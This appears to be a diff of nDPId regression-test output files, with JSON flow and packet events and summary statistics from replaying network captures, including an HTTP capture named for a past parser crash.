00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614898090218,"flow_last_seen":1614898090218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1614898090218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614898090218,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EFJAAD8GBe\/AqAJkoCzCQqcMFGeOCpYjAAAAAKAC\/\/+UDgAAAgQFtAQCCAoBYq1xAAAAAAEDAwg="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1614898090245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614898090245,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpwwosEHQjgqWJGASchC2bwAAAgQFrAAA"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1614898090249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614898090249,"pkt":"eJS0JASgYDjgxTWgCABFAAAoEFNAAD8GBgLAqAJkoCzCQqcMFGeOCpYkKLBB0VAQ\/\/9ANQAA"}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":135,"packets-processed":135,"total-skipped-flows":0,"total-l4-data-len":5105,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1614898324173}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 135/135

46
test/results/http-crash-content-disposition.pcap.out
View File

@@ -1,36 +1,24 @@
00481{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1492518365663}
00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365663}
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"}
00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365767}
00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"}
00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365789}
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="}
00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809}
00919{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":480,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":480,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAB4NS9QABABvS\/wKgAZ66BAArH4wBQe0Wpb5FXH2uAGADlVxoAAAEBCAoAFH3uK6FboVBPU1QgL2ltZXNzYWdlcy5waHA\/c29uZ2lmeV9hPTNoMjQ4Zklid0ombmV3IEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMjIwDQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTV2N0xoYm5hMnJld0hyajBlX0Y4d3IwV0FWVHBZOTNFVDlpUUhEeQ0KSG9zdDoga2h1LnNoDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBBcGFjaGUtSHR0cENsaWVudC9VTkFWQUlMQUJMRSAoamF2YSAxLjQpDQoNCi0tNXY3TGhibmEycmV3SHJqMGVfRjh3cjBXQVZUcFk5M0VUOWlRSER5DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImlzYW5kcm9pZCINCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD1VUy1BU0NJSQ0KQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogOGJpdA0KDQox"}
00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809}
00407{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAY9S+QABABvY7wKgAZ66BAArH4wBQe0WrG5FXH2uAGADlbXAAAAEBCAoAFH3uK6FboQ0KLS01djdMaGJuYTJyZXdIcmowZV9GOHdyMFdBVlRwWTkzRVQ5aVFIRHktLQ0K"}
00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913}
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN0QAAtBpq1roEACsCoAGcAUMfjkVcfa3tFqxuAEAB6YXsAAAEBCAoroVwyABR97g=="}
00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913}
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN1QAAtBpq0roEACsCoAGcAUMfjkVcfa3tFq0qAEAB6YUsAAAEBCAoroVwzABR97g=="}
00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968}
02271{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1492,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1492,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAF1EN2QAAtBpUTroEACsCoAGcAUMfjkVcfa3tFq0qAEAB6GowAAAEBCAoroVxpABR97khUVFAvMS4xIDIwMCBPSw0KU2VydmVyOiBuZ2lueA0KRGF0ZTogVHVlLCAxOCBBcHIgMjAxNyAxMjoxOToyNSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpYLVBvd2VyZWQtQnk6IFBIUC81LjMuMw0KQ29udGVudC1MZW5ndGg6IDIxODcNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KPGltc2dzPgo8dGltZXN0YW1wPjEzNTgyNzg0NTA8L3RpbWVzdGFtcD4KPGZyZXF1ZW50bHlfc2hvdz4zPC9mcmVxdWVudGx5X3Nob3c+CjxmcmVxdWVudGx5X3Nob3dfZmlyc3Q+MzwvZnJlcXVlbnRseV9zaG93X2ZpcnN0Pgo8bWVzc2FnZV9saXN0PgoJPG1lc3NhZ2U+CgkJPGlkPjE4PC9pZD4KCQk8dGl0bGU+RnJvbSBCcnVubyBNYXJzIHRvIFJpaGFubmE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5QbGF5IHRoZSBob3R0ZXN0IHNvbmdzIGVmZm9ydGxlc3NseSBvbiB0aGUgIzEgcGlhbm8gYXBwITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vYXBpLnNtdWxlLmNvbS92Mi9yZWRpcmVjdC9leUozWldKVmNtd2lPaUpvZEhSd09pOHZjR3hoZVM1bmIyOW5iR1V1WTI5dEwzTjBiM0psTDJGd2NITXZaR1YwWVdsc2N6OXBaRngxTURBelpHTnZiUzV6YlhWc1pTNXRZV2RwWTNCcFlXNXZJaXdpYlc5aWFXeGxWWEpzSWpvaWJXRnlhMlYwT2k4dlpHVjBZV2xzY3o5cFpGeDFNREF6WkdOdmJTNXpiWFZzWlM1dFlXZHBZM0JwWVc1dklpd2lZMkZ0Y0dGcFoyNUpaQ0k2TVRReU1pd2lZWEJ3SWpvaVRVbE9TVkJKUVU1UFgwRk9SRkpQU1VRaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDUxMzc2MzQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4xNzwvaWQ+CgkJPHRpdGxlPkRvd25sb2FkIFNpbmchIEthcmFva2UgZm9yIEZSRUU8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5TaW5nIHNvbmdzIGJ5IDFELCBDYXJseSBSYWUgSmVwc2VuLCBCaWViZXIgJmFtcDsgbW9yZSE8L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1YzJsdVoyRnVaSEp2YVdRaUxDSnRiMkpwYkdWVmNtd2lPaUp0WVhKclpYUTZMeTlrWlhSaGFXeHpQMmxrWEhVd01ETmtZMjl0TG5OdGRXeGxMbk5wYm1kaGJtUnliMmxrSWl3aVkyRnRjR0ZwWjI1SlpDSTZNVEV4T0N3aVlYQndJam9pVTBsT1IxOUhUMDlIVEVVaWZRPT08L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjY3NzM5MA=="}
00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365968}
01585{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":981,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":981,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAD1UN3QAAtBpcRroEACsCoAGcAUMfjkVclC3tFq0qAGAB6wJEAAAEBCAoroVxpABR97jQ8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMDwvaWQ+CgkJPHRpdGxlPkEgUGVwIFRhbGsgZnJvbSBLaWQgUHJlc2lkZW50ITwvdGl0bGU+CgkJPGRlc2NyaXB0aW9uPldhdGNoIHRoZSBuZXdlc3QgdmlkZW8gZnJvbSBUaGUgR3JlZ29yeSBCcm90aGVycywgYW5kIHBlcmZvcm0geW91ciBvd24gcmVuZGl0aW9uITwvZGVzY3JpcHRpb24+CgkJPHVybD5odHRwOi8vd3d3LnlvdXR1YmUuY29tL3dhdGNoP3Y9bkZHY3JZUGRySlU8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4xPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYzNTQyNDg8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KCTxtZXNzYWdlPgoJCTxpZD4yMTwvaWQ+CgkJPHRpdGxlPlJhcCBsaWtlIEVtaW5lbSE8L3RpdGxlPgoJCTxkZXNjcmlwdGlvbj5BdXRvUmFwIHR1cm5zIHNwZWVjaCBpbnRvIHJhcCAoYW5kIGNvcnJlY3RzIGJhZCByYXBwaW5nKS48L2Rlc2NyaXB0aW9uPgoJCTx1cmw+aHR0cDovL2FwaS5zbXVsZS5jb20vdjIvcmVkaXJlY3QvZXlKM1pXSlZjbXdpT2lKb2RIUndjem92TDNCc1lYa3VaMjl2WjJ4bExtTnZiUzl6ZEc5eVpTOWhjSEJ6TDJSbGRHRnBiSE0vYVdSY2RUQXdNMlJqYjIwdWMyMTFiR1V1WVhWMGIzSmhjQ0lzSW0xdlltbHNaVlZ5YkNJNkltMWhjbXRsZERvdkwyUmxkR0ZwYkhNL2FXUmNkVEF3TTJSamIyMHVjMjExYkdVdVlYVjBiM0poY0NJc0ltTmhiWEJoYVdkdVNXUWlPakUxTVRNc0ltRndjQ0k2SWtGVlZFOVNRVkJmUjA5UFJ5Sjk8L3VybD4KCQk8dHlwZT4wPC90eXBlPgoJCTxjYXRlZ29yeT4zPC9jYXRlZ29yeT4KCQk8bWF4X2Rpc3BsYXlfbnVtPjIxNDYwNzU0MDI8L21heF9kaXNwbGF5X251bT4KCTwvbWVzc2FnZT4KPC9tZXNzYWdlX2xpc3Q+CjwvaW1zZ3M+"}
00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1492518365968}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492518365663,"flow_last_seen":1492518365663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492518365663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492518365663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365663,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492518365767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365767,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492518365789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1492518365789,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="}
00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492518365663,"flow_last_seen":1492518365809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1492518365809,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"khu.sh","url":"khu.sh\/imessages.php?songify_a=3h248fIbwJ&new","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}}
00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492518365663,"flow_last_seen":1492518365968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2844,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1492518365968,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-data-len":2844,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1492518365968}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 9/0
~~ packets captured/processed: 9/9
~~ skipped flows.............: 0
~~ total layer4 data length..: 0 bytes
~~ total detected protocols..: 0
~~ total active/idle flows...: 0/0
~~ total layer4 data length..: 2844 bytes
~~ total detected protocols..: 1
~~ total active/idle flows...: 1/1
~~ total timeout flows.......: 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ total memory allocated....: 5099937 bytes
~~ total memory freed........: 5099937 bytes
~~ total allocations/frees...: 113310/113310
~~ total memory allocated....: 5101178 bytes
~~ total memory freed........: 5101178 bytes
~~ total allocations/frees...: 113326/113326
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 201 chars
~~ json string max len.......: 2276 chars
~~ json string avg len.......: 1195 chars
~~ json string min len.......: 475 chars
~~ json string max len.......: 844 chars
~~ json string avg len.......: 643 chars

12
test/results/http-lines-split.pcap.out
View File

@@ -1,11 +1,11 @@
00467{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-lines-split.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593713340401}
